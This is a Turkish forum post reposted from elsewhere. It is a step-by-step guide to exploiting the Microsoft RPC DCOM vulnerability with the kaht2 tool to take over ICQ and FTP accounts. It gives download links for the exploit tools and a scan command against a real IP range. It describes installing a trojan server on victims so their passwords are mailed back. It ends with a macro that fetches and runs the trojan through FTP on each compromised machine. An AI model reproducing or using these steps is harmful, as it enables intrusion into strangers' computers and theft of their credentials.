Microsoft RPC DCOM açığı İLe İCq HaCK!!

ηòŦiСέS

New member
Katılım
10 May 2006
Mesajlar
901
Reaction score
0
Puanları
0
Konum
sizz sevgiLer ..
Baktım konu güncele taşınmış bende size bu açığın nasıl kullanacağınızı anlatayim dedim bu yöntemle icq ve ftp account larını hackleyebilirsiniz fakat kurbanınız nt tabanlı bir işletim sistemi kullanmak zorunda.

Öncelikle http://www.securitylab.ru/_exploits/kaht2.zip adresinden kath2 yi indiriyoruz. Programı c sürücüsüne koyuyoruz ve adım adım ilerliyoruz.
1- başlat -> çalıştır
2- komut satırına C\:kaHt2.exe 195.96.185.1 195.96.185.255 300 yazıyoruz ve Ok e tıklıyoruz
3- 195.96.185.1 195.96.185.255 yazmamızın nedeni bu ip aralığını taratmak istemememiz
4- 300 ise detay değeridir
5- böyle taratarak hangi bilgisayarlarda acık olduğunu bulacağız
6- karşınıza böyle bir komut satırı gelecek C:\WINDOWS\system32 >
7- simdi ise hedefimizi yani .dat dosyalarını ele geçirmeye gelelim
8- http://www.securitylab.ru/_tools/RPC2.zip adresinden RPC GUI v2 - r3L4x.exe programını indiriyoruz.
9- FTP Server bölümüne gidiyoruz ve Start düğmesine tıklıyoruz.
10- Herhangi bir trojan programı alın ve bir server.exe oluşturun ben proagent kullanıyorum
11- Oradaki texbox a get/trojan_server.exe yazıyoruz ve trojanımızı tanıtıyoruz
12- Ve saldırdığımız bilgisayar icin ! trojan_server.exe yazıyoruz ve geri kalan isimizi trojan programımız bizim yerimize hallediyor yani icq şifresini vs mailimize gönderiyor
13- Sonra exit e tıklıyoruz ve sıradaki kurbanımız için aynı işlemleri tekrarlıyoruz

IP aralığını istediğiniz gibi değistirebilirsiniz

Aslında bu isleri sadece kath2 programıyla da yapabilirdiniz ama sizin için basitleştirdim macrolarımıza ayarlarsak daha fonksiyonel bir kath2 elde edebiliriz.. Oda şöyle oluyor..

Kath2 nin bulunduğu klasöre gidin oradaki macros.txt dosyasını acın ve içinde ne var ne yok silin dosyanın içine sadece su satırları kopyalayın

[Macro]
name=upload_trojan
key =! 1
delay=900
cmd=ftp
cmd=open xxx.xx.xxx.xxx
cmd=asdf
cmd=get \trojan_server.exe
cmd =! trojan_server.exe > > a
cmd=bye



ALINTIDR!! :mad: :mad:
 
Geri
Üst